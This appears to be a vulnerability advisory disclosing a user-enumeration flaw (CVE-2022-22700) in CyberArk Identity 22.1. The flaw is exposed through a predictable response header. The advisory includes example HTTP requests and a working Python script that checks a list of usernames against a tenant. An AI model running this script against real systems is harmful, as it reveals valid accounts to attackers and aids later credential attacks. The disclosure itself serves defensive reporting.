CyberArk Identity 22.1 Vulnerability

Summary

NameCyberArk Identity 22.1 User Enumeration
Code namePorter
ProductCyberArk Identity
Affected versions22.1 and below
Fixed versions22.2
StatePublic

Vulnerability

KindUser Enumeration
Rule225. Proper Authentication Responses
RemoteYes
CVSSv3 VectorCVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
CVSSv3 Base Score5.3
Exploit availableYes
CVE ID(s)CVE-2022-22700

Description

CyberArk Identity versions up to and including 22.1 in the StartAuthentication resource, exposes the response header X-CFY-TX-TM. In certain configurations, that response header contains different, predictable value ranges which can be used to determine wether a user exists in the tenant.

Proof of Concept

  • A request is sent with a known valid user

Request:

POST /Security/StartAuthentication HTTP/1.1
Host: customer.my.idaptive.app
Content-Length: 143
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.82 Safari/537.36
Content-Type: application/json

{"TenantId":"","User":"[email protected]","Version":"1.0","AssociatedEntityType":"Portal","AssociatedEntityName":"Portal","ZsoSessionId":""}

Response:

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store, must-revalidate
Pragma: no-cache
Content-Type: application/json; charset=utf-8
X-CFY-TX-TM: 109
...

In the cases when the user exists, the value of X-CFY-TX-TM is always less than 500.

  • A request is sent with a non existent user

Request:

POST /Security/StartAuthentication HTTP/1.1
Host: customer.my.idaptive.app
Content-Length: 147
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.82 Safari/537.36
Content-Type: application/json

{"TenantId":"","User":"[email protected]","Version":"1.0","AssociatedEntityType":"Portal","AssociatedEntityName":"Portal","ZsoSessionId":""}

Response:

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store, must-revalidate
Pragma: no-cache
Content-Type: application/json; charset=utf-8
X-CFY-TX-TM: 1492
...

In the cases when the user does not exist, the value of X-CFY-TX-TM is always above than 1000.

Exploit

The following code was used to enumerate valid users:

#!/usr/bin/env python
#
# Author: [email protected]

import json
import requests
import sys

URL = 'https://<customer>.my.idaptive.app/Security/StartAuthentication'
RAW_DATA =  '{"TenantId":"","User":"[email protected]","Version":"1.0","AssociatedEntityType":"Portal","AssociatedEntityName":"Portal","ZsoSessionId":""}'
JSON_DATA = json.loads(RAW_DATA)

with open(sys.argv[1], 'r') as fd:
    USERS = [x.rstrip() for x in fd.readlines()]

for USER in USERS:
    VALUE = 10000
    PAYLOAD = JSON_DATA
    PAYLOAD['User'] = USER
    RESP = requests.post(URL, json=PAYLOAD)
    if 'X-CFY-TX-TM' in RESP.headers:
        VALUE = int(RESP.headers['X-CFY-TX-TM'])
    if VALUE < 1000:
        print(VALUE)
        print(f'[+] User {USER} exists.')
    else:
        print(f'[-] User {USER} not exists.')

Credits

The vulnerability was discovered by Andrés Roldán from the Offensive Team of Fluid Attacks.

References

Vendor page https://www.cyberark.com/resources/cyberark-identity/

Changelog https://docs.cyberark.com/Product-Doc/OnlineHelp/Idaptive/Latest/en/Content/ReleaseNotes/ReleaseNotes-Latest.htm

Timeline

Time-lapse-logo

2021-09-28

Vulnerability discovered.

Time-lapse-logo

2022-02-05

Vendor contacted.

Time-lapse-logo

2022-02-16

Vendor replied acknowledging the report.

Time-lapse-logo

2022-02-28

Vulnerability patched.